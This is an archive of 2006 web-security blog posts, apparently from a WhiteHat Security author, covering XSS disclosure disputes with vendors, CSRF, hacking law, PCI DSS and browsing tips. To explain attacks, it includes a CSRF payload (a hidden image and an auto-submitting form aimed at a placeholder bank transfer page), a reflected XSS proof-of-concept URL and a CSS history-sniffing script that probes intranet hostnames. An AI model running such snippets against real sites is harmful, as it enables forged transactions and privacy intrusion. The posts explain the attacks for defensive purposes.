Thursday, September 28, 2006

XSS Disclosure Drama

Here's a quick link recap of the ongoing drama occurring on sla.ckers.org. Dozens and dozens of XSS issues are being disclosed in major websites, even those of security companies (Acunetix, F5, ISC2, etc.). Acunetix and F5 say, we're not vulnerable! A couple of security industry folks question the strategy of their response and offer their own two cents worth of advice. The hackers strike back by identifying other XSS issues, this time with pictures of STALL0W3D!1. Acunetix says still no, must have been our honeypot.

Bottom line: Time to find and fix your XSS issues before you end up on the wall of shame, or worse.

Wednesday, September 27, 2006

When disclosure roles are reversed

Update: Another well-written industry-insider viewpoint on the incident(s), 3 Rules of Incident Response for Public Affairs. Don't mind the silly alert pop-up.

Kelly Jackson Higgins (Dark Reading) posted a nice follow-up to all the XSS disclosures going on, particularly ones within the websites of security companies. According to the story, both Acunetix and F5 denied they had any XSS issues. Fair enough, but as anyone could have predicted, the disagreement between the posters on sla.ckers.org and the vendors is bound to cause more activity, and indeed it already has. It's not as if they can't simply go looking for more. Personally, I'm not so much interested in this specific case as in the larger industry perspective.

I’ve said many times, no matter who you are or what you do, incidents happen to everybody sooner or later. For security vendors, and I am one, one of the last things you want is someone publicly disclosing vulnerabilities in your website. Especially when the issue is something you’re supposed to be able to protect against with your product or service. At that point the most important thing is how you go about handling the situation.

If the issue really did exist

You could take the approach of quietly fixing the vulnerability and then denying the issue existed should anyone ask. Web application security vulnerabilities are difficult to verify after the fact. The problem with this approach is that it runs the risk of annoying the hacker types by not acknowledging the issue. They may take this as an opportunity to embarrass you further should they find something else you may have missed. I think we’d all prefer not to become a continuing target.

Or

Come clean. Acknowledge there was a problem and that it was swiftly resolved. Provide some verbiage as to what changes are being made to make sure it never happens again. You could also supply a security contact email address should anyone find something else in the future. This approach shows honesty, integrity, and a willingness to improve upon due diligence. Not only do you take the current matter off the table, you’re providing a private channel of communication before a situation becomes public.

Or

Blame the company hosting your website!

If the issue really didn’t exist

State clearly why you don’t think the vulnerability existed. In a non-defensive manner, ask for more information from the person in a private setting. They’ll appreciate the care, and any conversation can be kept in confidence. Explain to whoever is interested that you’re looking into the matter and will promptly resolve any problems that surface.

My Advice

One way or the other, we ALL better get used to dealing with vulnerability disclosure in our websites. Whoever we happen to work for won't matter. My advice is to take the matter seriously and act with due care. Don’t fall into the trap of denial, work productively with the person disclosing, and get ahead of the issue by clearly stating what you’re doing about it. You’ll be better off.

Tuesday, September 26, 2006

CSRF, the sleeping giant

Cross-Site Request Forgery (aka CSRF or XSRF) is a dangerous vulnerability present in just about every website. An issue so pervasive and fundamental to the way the Web is designed to function that we've had a difficult time even reporting it as a "vulnerability". Which is also a main reason why CSRF does not appear on the Web Security Threat Classification or the OWASP Top 10. Times are changing and it’s only a matter of time before CSRF hacks its way into the mainstream consciousness. Chris Shiflett (principal of OmniTI) and I were speaking about this today and how to best convey the issue's importance. CSRF may in fact represent an industry challenge far exceeding that of Cross-Site Scripting (XSS).

CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly, CSRF could have transferred funds, posted comments, compromised email lists, or reconfigured the network. When a victim is forced to make a CSRF request, it will be authenticated if they’ve recently logged in. The worst part is that all system logs would verify that you in fact made the request. It's been done before, only not often. Yet.
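To make that concrete, here's a minimal sketch of what a CSRF payload can look like. The bank URL and parameter names are made up for illustration; the point is that the victim's browser sends the request, session cookies and all, without the victim doing a thing.

<!-- Hidden in any page the victim happens to view. URL and parameters are hypothetical. -->
<img src="http://bank.example.com/transfer?to=attacker&amount=1000"
     width="1" height="1" style="display:none" alt="">

<!-- For targets that only accept POST, an auto-submitting form does the same job. -->
<form name="csrf" action="http://bank.example.com/transfer" method="post">
  <input type="hidden" name="to" value="attacker">
  <input type="hidden" name="amount" value="1000">
</form>
<script type="text/javascript">
  // The browser attaches the victim's cookies to the forged request automatically.
  document.forms['csrf'].submit();
</script>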

Dare we speak of The Dangers of Cross-Domain Ajax with Flash?

Challenges

Volume- Nearly every feature on every website is vulnerable to CSRF. When/if we begin reporting CSRF issues, it's going to be on the order of dozens per website, thousands when counting open source and commercial web applications (look out bugtraq), and in the millions when speaking on a Web-wide scale.

Identification- Finding CSRF is very difficult to automate with current scanning technology and by and large must be performed manually. Therefore what would be considered a comprehensive vulnerability assessment becomes more time-consuming and expensive.

Hard to Solve- This is the really bad part about CSRF: it’s much more difficult to fix. That is, relative to the 1 or 2 line fixes we’re used to with XSS or SQL Injection. CSRF solutions may require CAPTCHA's (blech), Session Tokens, Flow Control, etc. These are solutions requiring many more lines of code, where a proper implementation is harder to get right. Imagine having to inform a developer they're going to have to put CAPTCHA’s or Session Tokens on every one of a hundred forms. Ugh.
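For what it's worth, here's a rough sketch of the session token approach. The field name and token value below are my own invented example, not a drop-in fix: the server embeds an unpredictable per-session value in each form and refuses any request that doesn't echo it back.

<!-- Server-generated page: embed a secret token tied to the user's session.
     "a7f39c1d" stands in for a random value that must be unpredictable and
     unique per session (or per form). -->
<form action="/transfer" method="post">
  <input type="hidden" name="csrf_token" value="a7f39c1d">
  <input type="text" name="to">
  <input type="text" name="amount">
  <input type="submit" value="Transfer">
</form>

<!-- On submission, the server compares the posted csrf_token against the copy
     stored in the session and rejects the request if they differ. A page on
     another domain can force the request, but it cannot read the token, so a
     forged request fails the comparison. -->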

Where we go from here

We are looking ahead to a serious and wide-reaching yet-to-be-exploited vulnerability, one the bad guys will eventually figure out how to monetize, and our solutions are sorely lacking. For those in the industry who want to make a significant difference, THE FIELD IS WIDE OPEN. We need generic and innovative technology solutions for both CSRF identification and defense.

Is testing for XSS illegal?

Update: Directly from Daniel Cuthbert himself.
Your posting needs to be updated to reflect current UK, and possibly future European, laws.
Testing ANY website without authorisation is illegal in the uk. Under the Computer Misuse Act of 1990, it states "It is an offense to make a computer perform a function and for that function to be deemed unauthorised by the owner of that computer". Simply put, by doing a simple GET on the site could be deemed illegal if the owner didnt want you to do that. Testing for XSS is a punishable offense and people will, and have, been charged with this in the UK.

Wow. This is a seriously broad definition, dangerously so. Thanks for that, Daniel. I wonder how often this law is actually being used to prosecute. Coincidentally, there was another post on the legality of penetration testing today on SF pen-test, this time from Germany.

"in Germany we are about to implement the cybercrime treaty in local law with the number § 202 c. This change will make the possession, trafficking, making available and producing of tools with the *intention* for hacking and snooping traffic an offense punishable with up to a year in prison."

This might actually be helping the bad guys more than the good guys and also has implications for companies who run businesses making these tools (even the big guys). Then I went and looked up the U.S. Computer Fraud and Abuse Act (via Wikipedia). According to the 6 items listed that are against the law, they all seem to have the qualifier of "intent to defraud". This wording seems saner to me.


------


RSnake’s message board sla.ckers.org has been on fire with cross-site scripting vulnerability disclosures. There has been intense media coverage from Dark Reading, InfoWorld, TechWorld, syndication to Dr. Dobb’s, and even a Slashdot’ing for good measure. We all know XSS is a huge problem, a problem likely to get worse, but one issue that hasn’t been raised is legality. On what side of the law do you land when disclosing proof-of-concept (PoC) that a website is vulnerable to XSS? This is particularly important in light of the recent hacking conviction stories of Eric McCarty (SQL Injection) and Daniel Cuthbert (Directory Traversal). I’m no lawyer, but here’s my take.

We know penetration testing a website without consent is unethical and possibly illegal. Gaining access to sensitive information is clearly crossing the line. This is where XSS is different. Testing websites for XSS has nominal impact and does not require actual exploitation of anything. There is no legit reason to go after names, addresses, cookies, or credit card numbers, to attack users, create worms, etc. Exploitation PoC MAY be required in the case of SQL Injection or Directory Traversal, but certainly not XSS. Creating an XSS PoC link displaying a JavaScript alert box is harmless and all you really need. If you used the hole to launch an XSS-Phishing Scam, that’s cut-and-dried illegal in my book.
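For illustration, this is the sort of harmless PoC I mean, a link against a hypothetical search page that simply proves the site echoes attacker-supplied markup:

http://www.example.com/search?q=<script>alert('XSS')</script>

If the "q" parameter is reflected unfiltered, the page pops an alert box and nothing more. No data is touched and no user is attacked; the alert is the whole demonstration.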



Would this rationale keep you on the safe side of the law? I think so, hope so, but I certainly don’t know so. My bet is in the next 12 months we'll find out.

Monday, September 25, 2006

Symantec and Mitre agree, it's all about the web apps


The information security world is buzzing with web application security news. Headlines pour in daily about web worms, intranet hacking, JavaScript Malware, Hacking AJAX websites, XSS vulnerabilities published openly on major websites, and the open source WAF ModSecurity being acquired. It’s a lot to keep up with. Two years ago we were amazed to see an article a month, and if they were back-to-back we said, "look, a trend!" Now today Symantec releases their Internet Security Threat Report for the first half of 2006, teeming with web application security data. Inside there is some highly revealing knowledge and I’ll quote some of the interesting bits relevant to our space.
  • Web application vulnerabilities made up 69% of all vulnerabilities this period.
  • Seventy-eight percent of easily exploitable vulnerabilities affected Web applications.
  • Symantec documented 2,249 new vulnerabilities in the first half of 2006, an 18% increase over the second half of 2005.
This is huge and something the experts have been screaming about for a while. Not only do web application vulnerabilities represent the vast majority of documented issues, they are also the easiest to exploit! The report then starts to answer some questions as to why.

The marked increase in the number of vulnerabilities can be attributed to the continued growth in those that affect Web applications.
The high number of these vulnerabilities is due in part to the popularity of Web applications and to the relative ease of discovering vulnerabilities in Web applications compared to other platforms. Additionally, Web applications generally have quicker release cycles than traditional desktop and server applications. This provides security researchers with a continually growing source of new applications to audit, particularly as, in many cases, Web applications do not undergo the same degree of quality assurance and testing as other applications.

More software, more vulnerabilities. Rapidly changing software, more vulnerabilities. No one checking for security, more vulnerabilities. Makes sense to me. The one thing left out is that web applications are where the money is. And as the report says, attacks are growing more targeted and financially motivated.

Web 2.0 security threats and AJAX attacks expected to increase.

Sheesh, can it get worse?

Symantec recommends that administrators employ a good asset management system or vulnerability alerting service and management system.

Tell them what they own and what risks are on the horizon.

Enterprises should devote sufficient resources to alerting and patch deployment solutions.

Yep, patch diligently.

If they are developing Web applications in-house, developers should be educated about secure development practices, such as the Secure Development Lifecycle and threat modeling. If possible, all Web applications should be audited for security prior to deployment.

Hey! That’s what I do for a living. WhiteHat Sentinel, continuous vulnerability assessment and management for websites. Thanks for the validation Symantec! :)

Symantec also recommends that before any Web service or application is implemented, it undergo a secure code audit to ensure that it is not vulnerable to possible attack.

This tip needs more clarity. Every business critical web application should undergo a source code review. To spot things such as backdoors, nothing is better, but the question is how often. Personally I think source code reviews should be performed before an initial website launch and between MAJOR updates. Any more becomes highly cost-prohibitive and, in my humble opinion, vulnerability assessments offer better ROI.

Only JavaScript could make someone this pissed


How to Create Pop-Up Windows
"Never, ever, ever use the javascript: pseudo-protocol for anything, ever ever ever ever again. Please. Pretty please. The next time I click on a hyperlink, only to have it cause an error in my browser, I am going to hunt down the author and pound them into holy oblivion. I'm not joking — I will kill someone. Maybe two... Perhaps an entire company-full."

More big Web App Attacks

News from Netcraft, cPanel Security Hole Exploited in Mass Hack
"HostGator says hackers compromised its servers using a previously unknown security hole in cPanel, the control panel software that is widely used by hosting providers. "I can tell you with all accuracy that this is definitely due to a cPanel exploit that provides root access and all cPanel servers are affected," said HostGator system administrator Tim Greer. "Thi
s issue affects all versions of cPanel, from what I can tell, from years ago to the current releases, including Stable, Release, Current and Edge."

Ouch. And it gets worse! Hacked web pages were used to spread IE exploits.

"Hackers gained access to HostGator's servers late Thursday and began
redirecting customer sites to outside web pages that exploit an unpatched VML security hole in Internet Explorer to infect web surfers with trojans."

It's clear that websites and browsers need to be made more secure. In my opinion, we're just seeing the beginning.


Sunday, September 24, 2006

ModSecurity Acquired



Update: An interview with Ivan Ristic (via cgisecurity.com)

Ivan Ristic (Thinking Stone), the man behind ModSecurity, has joined forces with commercial WAF vendor Breach Security. I've been recommending ModSecurity for a long time, so first order of business: ModSecurity will remain open source, and better yet, it gets more development resources and an ambitious project roadmap that competitors should pay attention to. Awesome news!

This is a brilliant strategic move by Breach. They're acquiring a great piece of technology, instant leadership in WAF deployment, and a top-notch web application security professional to lead the charge. Properly executed this could be a huge win-win-win for Ivan, Breach, and the community.

Congratulations guys, we look forward to great things!

Thursday, September 21, 2006

Real Live XSS

Via RSnake's sla.ckers.org message board, XSS disclosures are in abundance! Dell, HP, MySpace, Photobucket, F5, Acunetix, and a slew of others are listed. Dark Reading has some timely coverage ("Hackers Reveal Vulnerable Websites") with yours truly quoted. SEO Egghead has a funny PoC from a Harvard website ("Go to Princeton Instead!"). Most of the proof-of-concept XSS links appear safe enough to click on, but I don’t recommend it, just in case.

Monday, September 18, 2006

Web app vulns take over top spots

Web application security is where the action is, and here are more numbers to prove it.

Numbers from Mitre's CVE (via Steve Christey)
Cross-Site Scripting: Attackers' New Favorite Flaw
Web vulns top security threat index
Web flaws race ahead in 2006
Web app vulns go 1,2,3

"For 2006, 21.5 percent of the CVEs were XSS; 14 percent SQL injection; 9.5 percent php "includes" and 7.9 buffer overflow. Last year was the first time XSS jumped ahead of buffer overflows, with 16 percent; SQL injection accounted for 12.9 percent; and buffer overflows accounted for 9.8 percent."

Summarized Honeypot Compromises (2006)
All compromises were from web application security vulnerabilities or weak passwords.

Sunday, September 17, 2006

Another week another few web app hacks

It's hard to tell if more hacks are occurring at the web application layer, if they are being reported more often, or if organizations are simply required to disclose when they occur. Whatever the case happens to be, interest in web application security by both the good guys and the bad guys is at an all-time high. I noticed a couple of recent headlines where the incident looked to me like it was due to insecure web applications.

Second Life, a 3-D virtual world entirely built and owned by its residents, had some data of its 650,000-strong user base compromised.

"Detailed investigation over the last two days confirmed that some of the unencrypted customer information stored in the database was compromised, potentially including Second Life account names, real life names and contact information, along with encrypted account passwords and encrypted payment information. No unencrypted credit card information is stored on the database in question. Unencrypted credit card information has not been compromised."

More headlines:
Urgent Security Announcement
Metaverse breached: Second Life customer database hacked
Second Life suffers security breach


Controversial audio recordings of Arnold Schwarzenegger uncovered on a public web server.

"The Democratic rival to California Gov. Arnold Schwarzenegger acknowledged Tuesday that his aides were responsible for obtaining a controversial audio file in a move that has led to allegations of Web site hacking."

More headlines:
Rival behind Schwarzenegger Web flap
Radio Station Disputes Gov.'s Claim Speech Website Was Hacked
Schwarzenegger Hacking Claims Crumbling Like A Bunch Of Girlie Men
In A Politically Sticky Situation? Blame A Hacker!


Nikon Magazine website compromised

“During a nine-hour period Tuesday, nine new Nikon World subscribers were able to view personal information of 3,235 individuals who had registered for the magazine, going back to Jan. 1. The information that was accessible included subscribers' addresses, contact details and credit card information.”


XSS strikes again, this time faking a new Google service

“Except the Gmail plus service is actually fake and been put together by a persitent code insertion flaw (Not just XSS but any content) that allows users to host a customised search service on the Google domain.”

More headlines:
Google plugs phishing hole
What's Wrong With Google?
Gmail Plus or Google Danger?
Exploiting Google for Phishing
Phising Exploit Discovered in ‘Google Public Search Service’

RSnake, funny and insightful


RSnake had a couple of recent posts that really got me thinking (he tends to have that impact on readers). One post was on single sign-on (SSO) and the other about surfing without JavaScript.

"For instance, I was visiting what was essentially a hacked site that had a redirection built into a Flash movie. Here I was, with Flash and JavaScript and Java turned off and yet I was still getting redirected. What’s the deal? Well, after doing a little research it turns out that
Flashblock requires that JavaScript is turned on. So to turn off Flash, I have to have JavaScript turned on - how is that helping me?"

For some reason this left me laughing for a good minute. Then for the life of me I couldn't figure out why no one noticed this before.

"Let’s say company-a.com has a website that you authenticate to. By virtue of single sign-on you are now authenticated to company-b.com. Now suddenly, CSRF via XSS in company-a.com that exploits company-b.com and would normally fail on company-b.com (becauuse previously I wasn’t logged in there) now functions. " ... "I’m in without even trying."


RSnake's exactly right. I hadn't run into SSO in so long, I forgot about this problem.

"The peril in single sign-on is that the least common denominator dictactes a large portion of the security for all members of the authentication network."

This also sounds a lot like the same issue Lex raised when considering email security to be more important than bank security. Essentially you're offloading security to another entity, and are you OK with that?

5 More Security Tips for Power Users

These tips go further than the usual advice of disabling JavaScript, Java, Active X, and Flash.

1) Delete your cache and cookies after each session
This sensitive information, which should be closely guarded, has a bad habit of becoming publicly accessible. If you’re using Firefox (and you are, right?), the Web Developer toolbar has a nice feature to “Clear Private Data” under the miscellaneous pull-down. You could also set the history to zero and deny all cookies. Your call.

2) Beware of overly long URL’s
Be especially suspicious of URL’s wrapping more than a single line and heavily disguised with URL-encoded characters. If you're not sure about the true nature of a URL, decode it and check to see if it has any HTML tags embedded within. If it does, you probably DON'T want to click.
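If you want a quick way to do the decoding yourself, something along these lines works as a bookmarklet or a small page of your own. The long URL below is a made-up example.

// Decode a suspicious URL and look for embedded markup (example URL only).
var suspect = "http://example.com/page?msg=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E";
var decoded = decodeURIComponent(suspect);

// Any HTML tags hiding behind the %xx encoding are a strong hint not to click.
if (/<[a-z!\/]/i.test(decoded)) {
  alert("Embedded HTML found:\n" + decoded);
} else {
  alert("Looks clean:\n" + decoded);
}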

3) URL shorteners
Pranksters and bad guys alike are using URL redirect services like TinyURL, snipURL, notlong, shorl, and doiop to disguise potentially malicious URL’s. To double-check on these URL’s I’ve been using the command line to issue an HTTP request directly to see where the Location header is pointing. If the redirect URL looks safe, then I’ll click. Never can be too careful with these things.
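If you'd rather not hand-craft the request, here's the kind of command-line check I mean; the shortened path is made up for the example.

$ curl -sI http://tinyurl.com/abc123 | grep -i '^Location:'
Location: http://www.example.com/wherever-it-really-points

The -I flag asks curl for a HEAD request, so only the headers come back and the destination page never actually loads.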

4) Damn those secret questions!
Everyone eventually forgets a password and needs to regain access to their account. Most password recovery methods are fairly straightforward, providing a few different options to verify your identity. The one method that really drives me crazy is the “clever” secret question and answer. There is no friggin’ way I’m giving any website the name of my 3rd grade teacher, dog, or high school, and certainly not my favorite color. If a breach were to occur, and they do all the time, then I’ve just lost MORE personal information. To circumvent this nonsense, I’ve begun treating secret QnA’s like username/password pairs. Imagine the surprise of the customer support person when I tell them the name of my dog is ji*P5c$r.

5) Use a virtual machine
For my tin-foil-hat-wearing brethren, consider using VMware when surfing off the reservation (so to speak). If anything strange happens during the current session, your important data remains well protected. Just remember to roll back to a known good state between sessions to protect your security and privacy.

Top 5 Tips to NOT Get Hacked Online

Update: WashingtonPost blogger Brian Krebs agrees with me on #1. "My advice: If you or someone you care about is in the habit of cruising the Web with IE, now would be a very good time to get acquainted with another browser that doesn't use IE's rendering engine, such as Firefox or Opera." Porn websites are exploiting IE 6 0-day vulnerabilities.

“Oh my God, I’m never doing anything on-line again!”
is a common reaction to one of my web application hacking presentations. Recently I’ve been demonstrating how easily the average website or user can be hacked. No doubt scaring audiences has a certain mass appeal and gets people to pay attention to why the right security practices are of vital importance. People frequently ask if I still bank or shop online (of course I do), or how they can protect themselves when they do. For those who are not experts in computer security, here are my top 5 tips to a safer online experience (in addition to having firewalls, anti-virus, and patching diligently).

1) Switch your web browser to Firefox, Mozilla, Safari, or anything else besides Internet Explorer
This is probably the single most important thing you can do to protect yourself online. I’ve mentioned before that I’m a fan of staying secure by staying out of the line of fire. Internet Explorer is well known for being in the crosshairs of viruses, spyware, and adware. I know, I know, Microsoft is releasing the highly anticipated version 7, supposedly a security light-year ahead of everything else. A web browser so revolutionary it’s being pushed as a mandatory upgrade! Talk about an attractive target for malicious hackers. In my view it’s best to use an alternate product and remain out of the fray. If a website REALLY does need IE and you REALLY need to use the website, make sure the website is legit, then it’s reasonably safe to fire up IE.

2) Add more security to your web browser
No matter what browser you choose, the Web is a hostile place and they all need a little help to defend themselves. NoScript (Firefox extension), Netcraft Anti-Phishing Toolbar, E-Bay Toolbar, and Google Toolbar are great products that do just that. These add-ons help identify phishing websites, prevent your computer from being hacked, and keep passwords from falling into the wrong hands. Most people will only need the first two add-ons, but if you are an E-Bay buyer, using theirs is essential as well.

3) Don’t click on links in email, almost ever
Whenever possible try NOT to click on any links in email, especially since links themselves are dangerous and phishing emails are difficult to spot. An ounce of paranoia is worth a pound of patches. If I’m unsure whether an email is real, one thing I do is manually type the domain name into the web browser location bar. This way I know I’m on the real website. If Wells Fargo were to ask me to verify my account information by “clicking here”, instead I type in wellsfargo.com then proceed to login. If Wells Fargo, or whatever organization you're doing business with, really wanted to verify the account information they would have asked at that point. Some email links are safer to click on than others, like those sent in response to an action (account registration, password reset, order confirmation, etc.) you might have performed on the website within the last several minutes.

4) Defend your Web Mail!
Hundreds of millions of people use Web Mail, and in many ways email is more important to keep secure than your bank account. Many people have important online accounts tied to a single Web Mail address. If anyone gained access to your email account, all accounts associated with it could be compromised as well. The best thing you can do is use unguessable passwords, change them every six months or so, and don’t use that password anywhere else. Bonus points for deleting emails with any sensitive information.

5) Use a single credit card for online purchases
In light of recent events, chances are the CC #’s we use online are going to be stolen at some point. For that reason it’s best to try and limit any potential damage. Using a single credit card with just enough of a limit to conduct your online transactions makes it easier to monitor statements for any strange charges. Plus, any fraud is isolated to that one card. Also, refrain from using a debit card online since they don’t carry the same consumer legal protections as credit cards.

Normally this is the part where the experts start talking about SSL and tell you to check for the lock symbol. In my experience just about every legit website accepting credit cards is now SSL-enabled. So the better advice is to make sure you're actually on the legit website you think you are on. Otherwise SSL isn’t going to matter much anyway.

Monday, September 11, 2006

De-Anonymize Web Surfers with JS Malware

RSnake's research continues with another choice discovery by connecting together various JavaScript Malware hacks. To get the full technical picture you'll have to read several posts, starting with DNS Pinning Just Got Worse and Using CSS to De-Anonymize. This stuff gets complicated really quickly, not sure if I understand it all yet.

The deal here is that JavaScript Malware has access to a browser's DOM and History. We knew that from my earlier JS/CSS History PoC. Once your browser is infected with JavaScript Malware, the attacker makes educated guesses at internal network hostnames common to organizations (http://intranet/) to see if you've been there. And if it's not in your history, they'd use iframes to force a user to visit the URL, then re-check the history. Once they have an intranet target, they use DNS pinning and read the website across domains. They now know whom you work for. Rinse, repeat, and find out more about the victim.
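A stripped-down sketch of the history-check half, in the spirit of the JS/CSS trick, looks something like this. The hostname list and the colors are just my example; a real attack would guess far more names and keep the results to itself.

<style type="text/css">
  /* Visited links get a color we can test for from script. */
  a { color: rgb(0, 0, 255); }
  a:visited { color: rgb(255, 0, 0); }
</style>
<script type="text/javascript">
  // Run after the page body has loaded. Guess at common intranet hostnames
  // and see which ones the browser has already visited (example list only).
  var guesses = ["http://intranet/", "http://hr/", "http://wiki/"];
  for (var i = 0; i < guesses.length; i++) {
    var link = document.createElement("a");
    link.href = guesses[i];
    link.appendChild(document.createTextNode(guesses[i]));
    document.body.appendChild(link);

    var color = document.defaultView.getComputedStyle(link, null).getPropertyValue("color");
    if (color == "rgb(255, 0, 0)") {
      // The URL is in the browser history, so the victim has been there.
      alert("Visited: " + guesses[i]);
    }
  }
</script>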

Hack upon hack upon hack.



Saturday, September 09, 2006

email security over bank security

Last week Lex, WhiteHat Security co-founder, was saying to me that it’s much worse to have your email (Web Mail) broken into than your bank (Web Bank). Confused, my first thought was, “how can this be, that’s where my money is?” He explained that a very common forgot password (FP) system asks you to enter your email address and in return sends you a new password or a reset link. We’ve all seen and probably used these simple implementations. Lex’s logic was that if your email box is hacked, every web account associated with that address (using a send-email-forgot-password system) could be compromised, including your bank. A malicious hacker could simply sift through the victim's email to get the target list. This is a scary thought.

Lex may be right, I never thought about it this way before. Hundreds of millions of people regularly use GMail, AOL Mail, Yahoo Mail, Microsoft Hotmail, and a million other Web Mail providers every day. Websites using a send-email-forgot-password system are offloading identity verification to another website. Today’s savvy netizens have online accounts for airlines, hotels, rental cars, tax records, books, auctions, payment systems, loans, insurance, often all tied together via a single email address with a web-based interface. A well-crafted Cross-Site Scripting (XSS) attack would give direct access to the crown jewels.

I’m going to have to rethink my personal information security strategy. Maybe this is also a good reason to create a top-5 list for normal users.

Thursday, September 07, 2006

New PCI Data Security Standard released!

Update: Nothing I've read in the updated PCI DSS, nor anyone who has commented, suggests the text has been watered down. PCI DSS is well thought out, balanced, and comprehensive. Substitute "cardholder information" for any type of sensitive information and it's immediately useful elsewhere (banking?). What counts is enforcement. This is where a lot of questions remain about PCI DSS.


1) How strongly will the standard be enforced? Fines, higher fees, suspensions?
2) What vulnerabilities are ASV's going to be capable of finding?
3) How strongly will ASV's and QSA's be vetted to get on the lists? And what happens if they water down their processes and provide poor service?
4) How does a merchant know what vendors specialize in web application security?
5) What is considered an application layer firewall?



It's the day we've all been waiting for! *cue the drums* For a year and a half we waited, wondering what the mega payment card brands were going to decree about the Payment Card Industry Data Security Standard (PCI DSS). The infosec industry speculated, raised concerns, and passed along rumors. Yet, we had only a vague idea of what the future of PCI would hold for its subordinates. Then yesterday, the PCI DSS v1.1 was finally released! *sound the trumpets* It's time!

One Committee to rule them all

Announced is the formation of the PCI Security Standards Council (SSC), a fellowship of 5 with representatives from AMEX, Discover, JCB, MasterCard, and Visa. They serve as the central authority overseeing updates to the PCI DSS, as well as training and certification of Qualified Security Assessors (QSA) and Approved Scanning Vendors (ASV). The payment card brands individually, and further down the chain the acquiring banks, are responsible for enforcement of PCI DSS amongst merchants and service providers.

What does the Committee command?

PCI DSS commands compliance with 12 core requirements. Simple enough since it’s the same 12 from before. Changes to the standard are mostly for cosmetics, consistency, and clarity. The OWASP Top Ten remains the recommended best practice for software development, despite its creators saying this is not what it's meant for. The significant change in PCI DSS is the addition of section 6.6:

6.6 Ensure that all web-facing applications are protected against known attacks by applying either of the following methods:
• Having all custom application code reviewed for common vulnerabilities by an organization that specializes in application security
• Installing an application layer firewall in front of web-facing applications.
Note: This method is considered a best practice until June 30, 2008, after which it becomes a requirement.

Hoowah! Assemble the troops for battle.

This will take an army of thousands

Let's attempt to estimate the nation-wide monetary cost to merchants and the workload required of an "organization that specializes in application security". Netcraft says there are 96,854,877 sites and 497,833* SSL certificates in circulation. Assuming the vast majority of websites potentially accepting credit cards (CC) use SSL, we'll round up to 500,000 total certs in circulation. Assuming only 10% of websites using SSL accept CC's, that leaves a world of 50,000 websites needing source code reviews. Keep in mind we're only counting SSL/CC websites. PCI DSS section 6.6 says "all web-facing applications" from merchants need source code reviews, so the world may in fact be exponentially larger.

* Total Certs = 358,938 / 72.1%
(358,938 is the combined SSL cert count of VeriSign and GeoTrust; 72.1% is their combined market share)


A common source code review performed by the average reviewer on the average small-mid-sized web application costs about $40,000. At $150 per hour (bill rate), that’s 267 man-hours per review. Let's try some of my gorilla math.

To source code review all 50,000 websites each year requires:
  • 13,350,000 total man-hours (50,000 * 267 hours)
  • 6,675 qualified source code reviewers (13,350,000 / 2000 full-time hours per year)
  • $2,000,000,000 annual economic burden on merchants! ($40,000 * 50,000)
If anyone wants to help adjust my numbers based on better figures, by all means let me know. My thinking is there’s no way merchants are going to endure even close to that much cost for source code reviews, even if there were over 6,000 qualified source code reviewers ready to go. That means 2008 might actually come in 2007.

Fall back behind the web application firewalls!

ModSecurity, an open source intrusion detection and prevention engine for web applications, may be just what organizations need to fulfill PCI DSS compliance obligations without the sticker shock. According to a recent Forrester Research report on Web Application Firewalls (Q2 June 2006), "...ModSecurity is by far the most extensively deployed Web application firewall, with more than 10,000 customers." and "ModSecurity's stringent implementation standards — build nothing unless you approach the highest level of security — will push the entire Web application firewall market toward higher-quality products." I've been recommending ModSecurity for a long time and my bet is we'll see a huge surge in installations. Especially since commercial licensing, support, and a soon-to-be-released ModSecurity Console are on the horizon.

Weaknesses in the defenses

Validation of Compliance is an instrumental part of PCI DSS; otherwise merchants and service providers could simply pay lip service to the payment brands. Approved Scanning Vendors (ASV) like WhiteHat Security ensure there are no high-level vulnerabilities in web-facing networks and websites. PCI DSS and the Security Scanning Procedures documents provide guidance as to the scope of everything we’re supposed to scan, how, and how often. We’re instructed to do no harm, told what reports must contain, and told how results are to be interpreted.

"11.2 Run internal and external network vulnerability scans at least quarterly and after any significant change in the network (such as new system component installations, changes in network topology, firewall rule modifications, product upgrades).
Note: Quarterly external vulnerability scans must be performed by a scan vendor qualified by the payment card industry. Scans conducted after network changes may be performed by the company’s internal staff.
11.3 Perform penetration testing at least once a year and after any significant infrastructure or application upgrade or modification (such as an operating system upgrade, a sub-network added to the environment, or a web server added to the environment). These penetration tests must include the following:
11.3.1 Network-layer penetration tests
11.3.2 Application-layer penetration tests."

ASV's are informed of just about everything, EXCEPT WHAT VULNERABILITIES WE NEED TO BE ABLE TO FIND! I’ve not been able to find anything documented about the vulnerabilities, checks, or classes of attack capabilities required for ASV acceptance. Though to become an ASV, you need to pass the test.

“How to Become an Approved Scanning Vendor
For the actual test, each applicant runs its test tool(s) against the Council's test Web perimeter and submits its results. After remotely scanning the test infrastructure, the vendor must identify the vulnerabilities and misconfigurations found, and report its findings in both executive and detailed test reports.”

As I said, WhiteHat Security is an ASV and hence passed the test. We strongly believe being able to find all vulnerabilities all the time (the goal) is the only way to achieve adequate security. Since we go above and beyond, the minimum bar for passing didn’t matter much. However, without a solid minimum bar, any script-kiddy with a check-for-nothing scanner could become an ASV and start providing insanely cheap PCI compliance reports, complete with a false sense of security at no extra charge. I’m also unable to do the same math for quarterly scans (as for source code reviews) because there is no way to gauge price per website.

Goes to show compliance and security are two different things.

Wednesday, September 06, 2006

Eric McCarty pleads to SQL Injection on USC site

Rob Lemos from SecurityFocus writes about the recent developments in the case of Eric McCarty and the University of Southern California (USC).

I've been following Eric's story since he first made news by disclosing a SQL Injection vulnerability in USC's online student application. Eric's plea agreement stipulates that he'll serve three years of probation, possibly some home detention, and pay $36,800 in damages to USC. Could have been worse for Eric, but still seems like a lot to pay for helping to protect the sensitive information of thousands. Don't get me wrong, what Eric did was against the rules, but he's not one of the "bad guys" we need to worry about either.

Only a few days ago I wrote that vulnerability "discovery" is more important than disclosure to the information security industry. Talk about validation! "The case should send a message to vulnerability researchers that they must obey the law when looking for flaws in Web sites", said Michael C. Zweiback, Assistant U.S. Attorney for the Central District of California. We get the message and are also trying to figure out what the lasting repercussions will be for software (in)security.

Who's on the side of the consumer?

